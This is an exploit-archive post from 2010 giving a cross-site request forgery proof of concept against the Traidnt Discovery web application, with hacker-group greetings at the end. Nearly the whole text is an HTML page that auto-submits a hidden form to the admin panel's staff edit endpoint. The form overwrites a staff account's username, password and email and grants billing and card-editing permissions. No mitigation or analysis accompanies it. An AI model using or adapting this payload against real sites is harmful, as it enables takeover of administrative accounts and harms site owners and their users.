Traidnt Discovery Cross Site Request Forgery

`  
  
# Exploit Title: Traidnt Discovery - [CSRF/Change Username & Password] Staff  
Account  
# Date: 16-06-2010  
# Author: G0D-F4Th3r  
# Software Link: http://discovery.traidnt.com/demo/  
# Version: 1.0  
  
====================================[form]================================================  
<html>  
<form name="r00t" action="  
http://www.site.com/[path]/admincp/staff.php?do=edit&id=1&go=update"  
method="POST">  
<body onload="document.forms.r00t.submit();">  
<input type="hidden" name="username" value="staff-username"/>  
<input type="hidden" name="password" value="staff-password"/>  
<input type="hidden" name="email" value="[email protected]"/>  
<input type="hidden" name="realname" value="Discovery"/>  
<input type="hidden" name="sig" value="discovery ..."/>  
<input type="hidden" name="viewsig" value="1"/>  
<input type="hidden" name="receivemsg" value="1"/>  
<input type="hidden" name="cat_array[]" value="1"/>  
<input type="hidden" name="cat_array[]" value="3"/>  
<input type="hidden" name="cat_array[]" value="2"/>  
<input type="hidden" name="viewserver" value="1"/>  
<input type="hidden" name="viewonline" value="1"/>  
<input type="hidden" name="sendmsg" value="1"/>  
<input type="hidden" name="accessbill" value="1"/>  
<input type="hidden" name="editcard" value="1"/>  
<input type="hidden" name="editcomm" value="1"/>  
<input type="hidden" name="service" value="1"/>  
<input type="hidden" name="olduser" value="staff-username"/>  
</form>  
</body>  
</html>  
====================================  
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My  
Friends  
  
  
  
`